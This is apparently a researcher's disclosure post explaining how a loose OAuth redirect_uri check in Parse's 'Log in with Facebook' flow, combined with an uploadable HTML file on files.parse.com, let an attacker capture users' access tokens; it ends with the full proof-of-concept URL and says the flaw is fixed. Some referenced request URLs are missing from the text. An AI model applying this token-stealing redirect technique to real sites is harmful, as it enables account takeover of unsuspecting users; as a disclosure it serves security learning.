In this post i’m going to show how i was able to hack into Parse accounts via OAuth vulnerability.
You can sign in into Parse by inserting your email and password or signing in with your Facebook account.
If we click on the “Log in with Facebook” button, a GET request is generated at this URL:
The parameters that we have to consider are:
So i started to create a forged URL that redirects the victim to a malicious site which saves the Parse token in a file.To do this,i started playing with the redirect_uri parameter to see if it allows access to subdomains or subfolders,and this was the result.
- xxx.parse.com (Allow redirect to subdomains)
- xxx.parse.com/xxx/ (Allow redirect to subfolders)
I noticed that the redirect_uri allow access to subdomains and subfolders, so i looked for open redirect vulnerability in Parse’s domain and subdomains but i coulnd’t find anything.
I realized that Parse’s subdomains files.parse.com allows me to upload an html file, so i uploaded an html file which has some html code which redirects me to a malicious URL.The output URL to see the content of the page was:
Final POC (Facebook already fix this issue)
https://www.facebook.com/dialog/oauth?response_type=token&client_id=506576959379594&redirect_uri=http://files.parse.com/07c3d9cb-7a00-48c1-81d2-51d1f90bd8ad/68f9cc54-b661-4448-a4bb-0f413a1bcf8e-wow.html&state=3c580f78d588e40668b80dc9b1e310db576cc830e0d02d08&scope=email This URL will redirect the user to the site which has a script that takes the token and will save it in a file.